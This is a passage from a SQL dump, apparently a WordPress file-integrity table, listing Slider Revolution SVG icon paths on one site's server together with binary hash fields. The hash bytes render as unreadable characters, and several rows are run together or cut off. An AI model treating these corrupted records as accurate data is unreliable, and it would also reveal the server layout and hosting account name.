5A*r','',0,'?'),('>s:1`-tv','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_inner_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_inner_24px.svg',0,'FBxj','',0,'?'),('1E:Le','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_style_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_style_24px.svg',0,'4nġ]\\hm\0','4nġ]\\hm\0','Ǹ`KoC9_k x 8c.','',0,'?'),('rڌ$j:','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_top_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_top_24px.svg',0,'-\'͚q%C[7','-\'͚q%C[7','m]P0+jHPN9yk˛>O4n','',0,'?'),('&hEuX','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_vertical_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_vertical_24px.svg',0,'Dc\\s!V\\j0f','Dc\\s!V\\j0f','2et.\'9rᬲK,-(񬡡t','',0,'?'),('<ћb\Z՛ij\0C','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_drag_handle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_drag_handle_24px.svg',0,'8/JU~.[s','8/JU~.[s','D:Ul0M翿 ފo','',0,'?'),('Ŕ&\"U','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_center_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_center_24px.svg',0,'݄!]qXrq','݄!]qXrq','5B$\rkPxG3\"LrٳI\naK','',0,'?'),('{)aq,8Nq|nTm','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_justify_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_justify_24px.svg',0,'-ި>I^','-ި>I^','atvO kH','',0,'?'),('Y9/Y~','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_left_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_left_24px.svg',0,'v%_skV','v%_skV','O>3YJ/P@Vy]]~.$','',0,'?'),('扽v;tC','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_right_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_right_24px.svg',0,'q;.y}r> ','q;.y}r> ','3&\r.LFHu\"̚*a9p','',0,'?'),(':6L4Lm','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_bold_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_bold_24px.svg',0,'|ǟXNb>','|ǟXNb>','xlwm̛9zmW8','',0,'?'),('}!~{s_Y^y0','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_clear_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_clear_24px.svg',0,'[|A.-ޮb','[|A.-ޮb','Md;]<&#RK|=;-ٖhcn\\\"','',0,'?'),('aL\\#љ','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_fill_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_fill_24px.svg',0,'WUXU','WUXU','\0 | E6\\EToRSR','',0,'?'),('݂{mU.`dY','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_reset_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_reset_24px.svg',0,'݌OXW*X','݌OXW*X','m2\'9җ\\,\nN1','',0,'?'),('clAlC]Xh','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_text_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_text_24px.svg',0,'S0BIVI','S0BIVI','[QiZD@F;֣lPK ','',0,'?'),('RMw}9Gv','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_decrease_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_decrease_24px.svg',0,'#+9Dbݞ֍ZѢ','#+9Dbݞ֍ZѢ',']k O-zd\"T(ُ\n!^\"\"jqZ','',0,'?'),('`5','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_increase_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_increase_24px.svg',0,'EO&t\'p1','EO&t\'p1','3y2Zb:I04 \\#9ͭB:','',0,'?'),('ˈ-X$%','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_italic_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_italic_24px.svg',0,'ΐKakܶ','ΐKakܶ','ص)]d$(g[ [Uv','',0,'?'),('~EDynY3 r','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_line_spacing_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_line_spacing_24px.svg',0,'sG{\ZGż:','sG{\ZGż:','.s7y{w˔Uw','',0,'?'),('\nAQ|t`','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_bulleted_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_bulleted_24px.svg',0,'ٷ=/ּƣC჋','ٷ=/ּƣC჋','#ޤchMn:Uw\0&N!','',0,'?'),(' >ݫ XAdQ','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_numbered_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_numbered_24px.svg',0,'bQw:ĀTX׸7','bQw:ĀTX׸7','\\M\n\nxN&@}7','',0,'?'),('F.ѝ}:','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_paint_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_paint_24px.svg',0,'xjG[b','xjG[b','|om wK:\n2','',0,'?'),('zU%&0-_y','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_quote_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_quote_24px.svg',0,'QE/XNf','QE/XNf','k\\oXc]?\\ث,c[Xw_7','',0,'?'),('ɩ%<8_%','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_shapes_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_shapes_24px.svg',0,'8F9D}','8F9D}','[ /]Oϼrn]E~s','',0,'?'),('?j50}΋h\0M','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_size_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_size_24px.svg',0,'x/Z-FB4','x/Z-FB4','\ny?ܾ%a,49IJy\'d;F/','',0,'?'),('}.`Et_{>','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_strikethrough_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_strikethrough_24px.svg',0,'[#,\'/','[#,\'/','!3D5P8= \nz:AvVʄ1','',0,'?'),('3)u3','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_l_to_r_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_l_to_r_24px.svg',0,'%qɀ\Zt','%qɀ\Zt','|$q\"2JfVwP U','',0,'?'),('> 4;O.R ','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_r_to_l_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_r_to_l_24px.svg',0,'\\`ɱA[FB','\\`ɱA[FB','%єvl\" Y@zЛg','',0,'?'),('?Z;zP0Cq','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_underlined_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_underlined_24px.svg',0,'[A|1H;>','[A|1H;>','J(T %_3tҐ5#01<','',0,'?'),('M(m2yN>U+cB','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_functions_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_functions_24px.svg',0,'Bfx ','Bfx ','p^\"x\\.7ɚ,@','',0,'?'),('\')+f\Zp','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_highlight_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_highlight_24px.svg',0,'ډm7.[>C_','ډm7.[>C_','!Rj/6=KܓNa1','',0,'?'),('OeGslŰrfal','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_chart_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_chart_24px.svg',0,'*5\":(;7+','*5\":(;7+','aO;L;_)~ԍ?ഥ:','',0,'?'),('p\0ywUY','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_comment_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_comment_24px.svg',0,' h/32/ʝm',' h/32/ʝm','EP)xiMZƥy^` }#^1ݽ','',0,'?'),(';&no΢в','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_drive_file_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_drive_file_24px.svg',0,'Gx4Cyt','Gx4Cyt','fC4k#@0b7.jɡg\n','',0,'?'),('t\r)g_k,','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_emoticon_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_emoticon_24px.svg',0,'l!qM+x k-','l!qM+x k-','\0ꧤ^vޕO͍rr0#t','',0,'?'),(' $MBKMY','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_invitation_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_invitation_24px.svg',0,':ɘ',':ɘ','M!LAY(;3B~z2}i YJWU','',0,'?'),(']{d.EApK{','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_link_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_link_24px.svg',0,'`t쭇J/','`t쭇J/','m.\\`rt=VE=','',0,'?'),('p >ܗ, 6M','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_comment_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_comment_24px.svg',0,'\Z $V2_','\Z $V2_','pکbܚ9Yp @GkERqeЀͧ','',0,'?'),('; \n )QB-x','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_edit_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_edit_24px.svg',0,'905Hq^€\Z','905Hq^€\Z','vu;ׁOjI1','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_space_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_space_bar_24px.svg',0,'b?ľ\r’o','b?ľ\r’o','K6wX~)isԏ~Q֪/%ڑ','',0,'?'),('WWKwp@`܃՞','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_strikethrough_s_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_strikethrough_s_24px.svg',0,'Kt\n[d}y_','Kt\n[d}y_','^Ju<8*z>a\n**.X','',0,'?'),(' S {J2','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_text_fields_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_text_fields_24px.svg',0,'<[m(7#\".','<[m(7#\".','+Y200?m*\0D;\'G','',0,'?'),('U kG޴','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_bottom_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_bottom_24px.svg',0,'8ⅼeE&O','8ⅼeE&O','B).nDEl*Yi-S ','',0,'?'),('[է!ig','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_center_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_center_24px.svg',0,'Ɗd`v+{#T$','Ɗd`v+{#T$','P6p}m fڳ)|)N0#','',0,'?'),('߃NT98u4zj#','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_top_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_top_24px.svg',0,'||PpqYd!','||PpqYd!','r/}w#\n$u)c1aƒr','',0,'?'),('ג٠R.G','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_wrap_text_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_wrap_text_24px.svg',0,'Hph@0sc','Hph@0sc','TAMop>)ܷF9سq\nc','',0,'?'),('# p`C$3ڎ%\05','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_attachment_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_attachment_24px.svg',0,'s{&\"v羨v','s{&\"v羨v','^DK9@O؈kxW','',0,'?'),('\Z[*~7','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_24px.svg',0,'3cV~Lj','3cV~Lj','.~ڌ|nxe:TEDOR[','',0,'?'),('\rf9@K+\rX','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_circle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_circle_24px.svg',0,'qf(l>&u7','qf(l>&u7','Cbdk=tv@','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_upload_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_upload_24px.svg',0,'o S{!+r|','o S{!+r|','Jh㯋#3mĤcڎ23\"}','',0,'?'),('(z>\Zm','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_24px.svg',0,'p5l_4U< >','p5l_4U< >','$-vģ\0-n\ZcĞߡT\rU','',0,'?'),('F\'хI+`A5','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_open_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_open_24px.svg',0,'v\'\Z5K$r.mU','v\'\Z5K$r.mU','\"`f(mE*PS+I>MHrD','',0,'?'),('Y1xj=@3\r','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_shared_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_shared_24px.svg',0,'BdalS','BdalS','$t2rn7ndf)#\\L&{\\','',0,'?'),('M&|ShŨ','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_24px.svg',0,'rǙBU& ','rǙBU& ',']B\\9f!u%7\\ 2]P\\U|','',0,'?'),('\\%V (֐ d۷|','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_connected_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_connected_24px.svg',0,'n9SNj(1','n9SNj(1','sIVJiAiOn_mT','',0,'?'),('I7w=ǫiH ','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_computer_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_computer_24px.svg',0,'2iݿJކ?R','2iݿJކ?R','=EkdB`&[{iPUTx','',0,'?'),('iqK(\'1','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_mac_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_mac_24px.svg',0,'d8V!>(.A','d8V!>(.A','l] %\'sڌ5;Wn g','',0,'?'),('aqt\0U&zE,','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_windows_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_windows_24px.svg',0,'=Z/˟p','=Z/˟p','4әWнq{ėHg_b3+U/-_','',0,'?'),('M%.\'9n','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_developer_board_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_developer_board_24px.svg',0,'y8W l!;8{g','',0,'?'),('56_o','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_gamepad_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_gamepad_24px.svg',0,' pT=2e\Z$',' pT=2e\Z$','[twݫjPeW>Üc4\'Xa ','',0,'?'),('&\nXL','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_24px.svg',0,'i7$o}|N.','i7$o}|N.','Q^nufǙ |c\n/w{h','',0,'?'),('L/߹t;v{','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_mic_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_mic_24px.svg',0,'fQ\nnμ','fQ\nnμ','xT\"QnvT3\\\00G qwϚ7','',0,'?'),('WgFCx','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_24px.svg',0,';pT65,',';pT65,','?_@0 z89,!\\qe','',0,'?'),('\ns.._P P.M','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_down_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_down_24px.svg',0,'wJ~Is\'%','wJ~Is\'%','4Yio(\rۻZ䙤\"Cex`0s','',0,'?'),('9B/2 df ','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_left_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_left_24px.svg',0,'RV*:2Q','RV*:2Q','L}\'BۿξG&_\\','',0,'?'),('ߟzFnJV','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_right_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_right_24px.svg',0,'=\nT\\׍GCA','=\nT\\׍GCA','47q\ZQپ\\`jήDŽ%ÝvδѿӋ','',0,'?'),('cX9ݎkE c=+','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_chromebook_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_chromebook_24px.svg',0,'܈Ñd&.F','܈Ñd&.F','pʛ;.|KlCG1\"','',0,'?'),('94 tS\rRŹ','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_mac_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_mac_24px.svg',0,'-?Zr','-?Zr','Ž6)t o','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_mouse_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_mouse_24px.svg',0,'JftΊNI10','JftΊNI10','Ѭ/\Zd3=$)P f⫤','',0,'?'),('_\'k }ul\'','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_android_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_android_24px.svg',0,',c +',',c +','?h5^e;k!ҵYy:U6\'11','',0,'?'),('Ko{txF6','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_iphone_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_iphone_24px.svg',0,'REgx*ޑַ','REgx*ޑַ',')IJ7NjttxZ\'D','',0,'?'),('o(v?1$n','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_24px.svg',0,'S4X ~W','S4X ~W','aAF\\.1\Z]rYS@|5w','',0,'?'),(',zd\Zߡ7\"7R','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_off_24px.svg',0,'.j8$_KxѨx','.j8$_KxѨx','_\Zo\n|Ѽ\04 vۭе ם','',0,'?'),('F7z#<','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_power_input_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_power_input_24px.svg',0,'D9ߴN?[','D9ߴN?[','{ܺ{/|ݘAJ\"p;}RyIo','',0,'?'),('2ywGnd[)q','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_router_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_router_24px.svg',0,'vS4gB','vS4gB','ѝvɰ2O7\n1SpU)3G','',0,'?'),('De#2R','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_scanner_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_scanner_24px.svg',0,'0J!DJ','0J!DJ',' /a{e_G&&kʠ','',0,'?'),(' -5JdtU','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_security_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_security_24px.svg',0,'uRX(\rz;\"/','uRX(\rz;\"/','ᘐ8N-Ę~W!o\nXW2.,ܓ','',0,'?'),('vIK]YLe','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_sim_card_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_sim_card_24px.svg',0,'`OeM.z1b;','`OeM.z1b;','zlwIbDi9/Gke!Y2\\','',0,'?'),('Yc⸓,%JeE','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_smartphone_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_smartphone_24px.svg',0,'{F\rAxPN(','{F\rAxPN(','꒖S|X.ori\ZN{A^\Z+','',0,'?'),('fad+qCKSg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_24px.svg',0,'jbsA\Z','jbsA\Z','sleJvu[8׶L~M\\y','',0,'?'),('{4.(u07Ƶ','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_group_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_group_24px.svg',0,'6?eQ','6?eQ',' 2)KSo=n','',0,'?'),('̓aQM*#zD','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_24px.svg',0,'N\\ׯp9@r]{','N\\ׯp9@r]{','2l/m@ًIx^+BF|%2','',0,'?'),('$MET~','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_android_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_android_24px.svg',0,'9%kv','9%kv','Jb\rWOZTG5@Kl','',0,'?'),('_DsDdC','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_mac_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_mac_24px.svg',0,'w+dm\Z#HUL','w+dm\Z#HUL','K9?bv?oXjwSZVz\r8','',0,'?'),(',i<(>u 2&','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_toys_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_toys_24px.svg',0,',%I\r\0ô]',',%I\r\0ô]','ft|\nXʸ\\dRWTtkMc','',0,'?'),('e\\vtAVA','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tv_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tv_24px.svg',0,'ֵΆ~G=F5','ֵΆ~G=F5','65At p˙!S7e߁6C','',0,'?'),('tko mO7T#=>@3e','',0,'?'),('n0m_epٓVp','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_24px.svg',0,'aĬ+ͬc o}s','aĬ+ͬc o}s','B\"Q|_ZDl%@-RDBd','',0,'?'),(':H,3>w\\C','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_photo_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_photo_24px.svg',0,'Lh2~ ','Lh2~ ','*]4\0AtJ[.vt[I','',0,'?'),('e*nVf3 7w','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_audiotrack_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_audiotrack_24px.svg',0,'`84Têޞ-R','`84Têޞ-R','8ͩ','ķ޾Ew(WD>ͩ',':uZ\"ʵ\\ 0oPx\\#U','',0,'?'),('5˅ў+b:i','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_linear_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_linear_24px.svg',0,'!Hll](','!Hll](','~zfhy3^F42@}rԜ΂','',0,'?'),('&cE8_bwݦ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_off_24px.svg',0,'v\\$=!v|,&ʒ(','v\\$=!v|,&ʒ(','F3늈ܔ݆DNq磝Zbth','',0,'?'),('ޚW*Hɒ\n:','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_on_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_on_24px.svg',0,'ƹurd{dfN','ƹurd{dfN','sgh[km4CqTB','',0,'?'),('UD','',0,'?'),('』\"}?TUL','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_7_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_7_24px.svg',0,'zQD ˙s','zQD ˙s','&QKv%N\0uIvY','',0,'?'),('OELvLŸ\Z6V& ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_broken_image_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_broken_image_24px.svg',0,'̺R\00P','̺R\00P','O3 Ϊ)j\nmU07Cn','',0,'?'),('D o1Ct@I','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brush_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brush_24px.svg',0,'v `$','v `$','cΣvi[4& r &&xX!','',0,'?'),('w~Iv 